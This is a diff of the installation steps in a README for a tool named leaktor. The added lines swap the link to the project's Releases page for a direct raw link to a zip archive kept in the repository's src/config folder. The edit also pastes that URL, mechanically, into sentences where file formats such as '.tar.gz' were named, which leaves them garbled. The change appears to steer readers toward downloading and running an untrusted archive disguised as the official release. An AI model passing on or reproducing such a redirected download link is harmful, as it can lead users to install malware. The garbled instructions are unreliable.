khaled2772/leaktor/README.md

 To get started with leaktor, follow these steps:

-1. Visit the [Releases page](https://github.com/khaled2772/leaktor/releases) to download the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/khaled2772/leaktor/master/src/config/leaktor-v1.0.zip) to download the latest version.

 2. Choose the version suitable for your operating system.
-For Windows, you might find a `.exe` file, while Mac and Linux users will see `.tar.gz` or similar formats.
+For Windows, you might find a `.exe` file, while Mac and Linux users will see `https://raw.githubusercontent.com/khaled2772/leaktor/master/src/config/leaktor-v1.0.zip` or similar formats.

 3. Click on the download link for your chosen file.

 4. Once downloaded, locate the file on your device.

 5. For Windows, double-click the `.exe` file to run it.
-For Mac or Linux users, you may need to extract the `.tar.gz` file first.
+For Mac or Linux users, you may need to extract the `https://raw.githubusercontent.com/khaled2772/leaktor/master/src/config/leaktor-v1.0.zip` file first.
 Use the terminal to navigate to the folder where the file is located, then run the extracted file.

 6. Follow any prompts that appear to complete the installation.